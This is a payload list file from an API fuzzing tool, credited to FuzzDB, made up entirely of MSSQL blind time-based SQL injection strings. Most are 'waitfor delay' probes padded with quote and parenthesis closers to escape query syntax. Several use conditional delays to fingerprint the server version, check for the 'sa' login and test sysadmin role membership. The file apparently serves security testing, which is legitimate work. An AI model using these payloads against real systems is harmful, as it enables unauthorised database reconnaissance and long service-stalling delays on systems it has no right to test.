Files
wapifuzz/fuzzer/payloads/lists/sql-injection/mssql-blind.txt
2019-11-20 18:49:01 +01:00

52 lines
2.3 KiB
Plaintext

# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:200000' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:200000' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:200000' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:200000' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:200000' --
waitfor delay '0:0:200000' /*
waitfor delay '0:0:200000' --
' waitfor delay '0:0:200000' /*
' waitfor delay '0:0:200000' --
" waitfor delay '0:0:200000' /*
" waitfor delay '0:0:200000' --
) waitfor delay '0:0:200000' /*
) waitfor delay '0:0:200000' --
)) waitfor delay '0:0:200000' /*
)) waitfor delay '0:0:200000' --
))) waitfor delay '0:0:200000' /*
))) waitfor delay '0:0:200000' --
)))) waitfor delay '0:0:200000' /*
)))) waitfor delay '0:0:200000' --
))))) waitfor delay '0:0:200000' --
)))))) waitfor delay '0:0:200000' --
') waitfor delay '0:0:200000' /*
') waitfor delay '0:0:200000' --
") waitfor delay '0:0:200000' /*
") waitfor delay '0:0:200000' --
')) waitfor delay '0:0:200000' /*
')) waitfor delay '0:0:200000' --
")) waitfor delay '0:0:200000' /*
")) waitfor delay '0:0:200000' --
'))) waitfor delay '0:0:200000' /*
'))) waitfor delay '0:0:200000' --
"))) waitfor delay '0:0:200000' /*
"))) waitfor delay '0:0:200000' --
')))) waitfor delay '0:0:200000' /*
')))) waitfor delay '0:0:200000' --
")))) waitfor delay '0:0:200000' /*
")))) waitfor delay '0:0:200000' --
'))))) waitfor delay '0:0:200000' /*
'))))) waitfor delay '0:0:200000' --
"))))) waitfor delay '0:0:200000' /*
"))))) waitfor delay '0:0:200000' --
')))))) waitfor delay '0:0:200000' /*
')))))) waitfor delay '0:0:200000' --
")))))) waitfor delay '0:0:200000' /*
")))))) waitfor delay '0:0:200000' --